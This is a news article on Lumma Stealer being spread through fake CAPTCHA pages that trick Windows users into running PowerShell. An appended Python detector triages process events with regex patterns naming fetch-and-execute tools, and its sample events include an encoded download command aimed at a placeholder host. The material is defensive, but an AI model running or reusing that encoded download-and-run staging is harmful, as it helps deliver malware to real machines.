Fake CAPTCHA pages are being used to hack your computer
Lumma Stealer, a recently identified information-stealing malware, is being distributed to users via fake human verification pages. According to researchers at cybersecurity firm CloudSEK, the malware targets Windows devices and is designed to steal sensitive information from the infected device. Worryingly, researchers have discovered multiple phishing websites that use these fake verification pages to trick users into downloading the malware. CloudSEK researchers have warned organizations to implement endpoint protection solutions and train employees and users on this new social engineering tactic.
Lumma Stealer malware is being spread via new phishing technique
According to the CloudSEK report, multiple active websites were found distributing the Lumma Stealer malware. The technique was first discovered by Unit 42 at Palo Alto Networks, a cybersecurity company, but the scale of the distribution chain is now believed to be much larger than previously thought.
The attackers set up several malicious websites and added a fake human verification system, which resembles Google’s Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) page. Unlike the regular CAPTCHA page, where users have to check a few boxes or perform similar pattern-based tasks to prove they are not a bot, the fake pages instruct the user to execute a number of unusual commands.
In one case, researchers discovered a fake verification page that asked users to execute a PowerShell script. A PowerShell script is a series of commands, and here the page instructed users to run them through the Windows Run dialog. In this case, the commands retrieved the contents of a file named a.txt hosted on a remote server. This caused a file to be downloaded and extracted on the Windows system, infecting it with Lumma Stealer.
The report also listed the malicious URLs that were spotted spreading the malware to unsuspecting users. However, this is not the complete list and there may be more such websites carrying out the attack.
The researchers also observed that content delivery networks (CDNs) were used to host and distribute these fake verification pages. Furthermore, the attackers were seen using base64 encoding and clipboard manipulation to evade detection. The same technique could be used to distribute other malware, although no such cases have been seen so far.
Because the attack relies on phishing rather than a software vulnerability, no security patch can prevent devices from being infected. However, there are a number of steps that users and organizations can take to protect themselves from the Lumma Stealer malware.
According to the report, users and employees should be made aware of this phishing tactic to avoid falling for it. Additionally, organizations should implement and maintain reliable endpoint security solutions to detect and block PowerShell-based attacks. Regularly updating and patching systems to reduce vulnerabilities that Lumma Stealer malware can exploit should also help.
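As an added example (not from the CloudSEK report or this article), the check below triages constructed Windows process-creation events for the chain described above: PowerShell launched from the Run dialog (parent explorer.exe) with a base64 -EncodedCommand whose decoded payload fetches a remote text file. The host name, file paths, event layout and the two-reason threshold are assumptions chosen for the example.

```python
import base64, re

# Spellings PowerShell accepts for the encoded-command switch (prefixes of -EncodedCommand).
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Signs that a decoded script reaches a remote host or runs what it fetched.
REMOTE_FETCH = re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|net\.webclient|invoke-expression|\biex\b", re.I)

def encode_ps(script: str) -> str:  # UTF-16LE then base64, as -EncodedCommand expects; used only to build samples
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):  # decoded -EncodedCommand payload, or None if absent or invalid
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (AttributeError, ValueError, UnicodeDecodeError):  # AttributeError: no switch found
        return None

def triage_event(parent_image: str, image: str, cmdline: str) -> list:
    """List the reasons a process-creation event resembles the fake-CAPTCHA chain (empty = nothing of note)."""
    reasons = []
    if image.lower().rsplit("\\", 1)[-1] not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if parent_image.lower().rsplit("\\", 1)[-1] == "explorer.exe":
        reasons.append("PowerShell spawned by explorer.exe, as a command entered in the Run dialog would be")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("base64 -EncodedCommand present")
        if REMOTE_FETCH.search(decoded):
            reasons.append("decoded payload fetches or executes remote content")
    return reasons

def scan(events) -> list:
    """Flag events with two or more reasons; an encoded command or an explorer.exe parent alone is routine."""
    flagged = []
    for parent, image, cmdline in events:
        reasons = triage_event(parent, image, cmdline)
        if len(reasons) >= 2:
            flagged.append((cmdline, reasons))
    return flagged

# Constructed sample events (parent image, image, command line); the host is a placeholder, not an IoC from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", PS, "powershell.exe -w hidden -enc " + encode_ps("$c = iwr 'http://fake-captcha.invalid/a.txt'")),
    (r"C:\Windows\System32\cmd.exe", PS, r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    (r"C:\Windows\System32\svchost.exe", PS, "powershell.exe -NoProfile -EncodedCommand " + encode_ps("Get-Date")),
]

for cmdline, reasons in scan(SAMPLE_EVENTS):
    print(cmdline[:45] + "...", "->", "; ".join(reasons))
```

Only the first sample is flagged: the scheduled-task style event with an encoded but harmless `Get-Date` collects a single reason and stays below the threshold.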